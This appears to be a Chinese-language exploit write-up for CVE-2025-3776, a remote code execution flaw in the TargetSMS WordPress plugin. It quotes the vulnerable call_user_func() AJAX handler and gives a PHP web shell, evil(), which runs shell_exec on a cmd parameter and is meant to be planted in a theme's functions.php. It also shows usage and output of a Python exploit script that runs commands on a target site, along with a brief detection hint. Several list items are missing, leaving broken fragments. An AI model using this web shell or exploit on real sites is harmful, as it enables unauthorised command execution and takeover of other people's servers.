该漏洞源于在用户可控的输入上使用 call_user_func(),且未通过允许的函数白名单进行过滤。这造成了一个逻辑缺陷,导致攻击者无需认证即可执行内存中已存在的任何 PHP 函数,从而引发严重的远程代码执行(RCE)风险。
文件:/inc/ajax.php
add_action('wp_ajax_nopriv_targetvrHHndler', 'targetvr_ajax_handler');
function targetvr_ajax_handler(){
$callback = targetvr_get_postData('callback', 'string');
if ($callback and function_exists($callback)){
call_user_func($callback);
} else {
targetvr_return_json(false);
}
wp_die();
}
此代码允许未认证用户触发内存中存在的任何函数,如果攻击者能够加载恶意函数,则同样可以触发。
要成功利用此漏洞,WordPress 环境中必须已存在一个可调用的函数。由于 WordPress 插件和主题可以自动加载函数,攻击者可以通过当前主题的 functions.php 文件注入自己的函数。
target.com/wp-content/themes/twentytwentyfour/functions.php
functions.php 末尾注入以下载荷:function evil() {
if (isset($_GET['cmd'])) {
echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
} else {
echo '<pre>' . shell_exec("whoami") . '</pre>';
}
exit;
}
✅ 这样可以确保
evil()函数被加载到内存中,并可通过call_user_func()执行。
python3 CVE-2025-3776.py -u http://target.com -c "id"
[*] Checking plugin version...
[+] Plugin version detected: 1.5
[+] Plugin is vulnerable. Proceeding with exploitation...
[*] Sending exploit request...
[+] Exploit succeeded!
<pre>uid=1(daemon) gid=1(daemon) groups=1(daemon)</pre>
Exploit By : Nxploited ( Khaled Alenazi )
usage: CVE-2025-3776.py [-h] -u URL [-c CMD]
CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5
# Exploit by Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-c, --cmd CMD Command to execute (default: whoami)
如果内存中没有可用的 evil() 函数或类似函数:
{"status":false}
functions.php(如上述演示)。evil() 的 PHP 文件。一旦恶意函数被加载,未认证的攻击者可以:
查找发送到以下地址的重复 POST 请求:
/wp-admin/admin-ajax.php?action=targetvrHHndler
并带有 callback=evil 或任何意外函数名
此信息仅供教育和伦理研究之用。作者对因使用此信息而导致的任何滥用或损害概不负责。
Exploit 作者:Nxploited (Khaled Alenazi)